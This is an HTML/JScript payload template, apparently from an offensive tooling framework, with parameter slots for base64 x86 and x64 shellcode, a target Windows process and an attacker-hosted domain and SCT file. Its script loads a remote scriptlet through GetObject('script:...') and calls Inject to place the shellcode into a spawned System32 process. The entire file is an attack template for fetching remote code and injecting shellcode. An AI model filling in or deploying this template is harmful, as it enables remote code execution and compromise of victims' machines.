[ShellCodex86]
value: notSet
process: b64Encode

[ShellCodex64]
value: notSet
process: b64Encode

[Process]
value: notSet

[HostedDomain]
value: notSet

[HostedSct]
value: notSet

[Template]
data:
	<html>
        <body>
            <script language="JScript">
                // URL to SCT file here
                // Example: GetObject('https://stuff.com/README.txt');
                var a = GetObject('script:${HostedDomain:value}/${HostedSct:value}');

                // Base64-encoded x86 shellcode
                var x86_sc = '${ShellCodex86:value}';

                // Base64-encoded x64 shellcode
                var x64_sc = '${ShellCodex64:value}';

                // Process to inject shellcode into (full path required)
                var spawn_process = 'C:\\Windows\\System32\\${Process:value}';

                // Injects shellcode into specified process
                a.Inject(x86_sc, x64_sc, spawn_process);
            </script>
        </body>
    </html>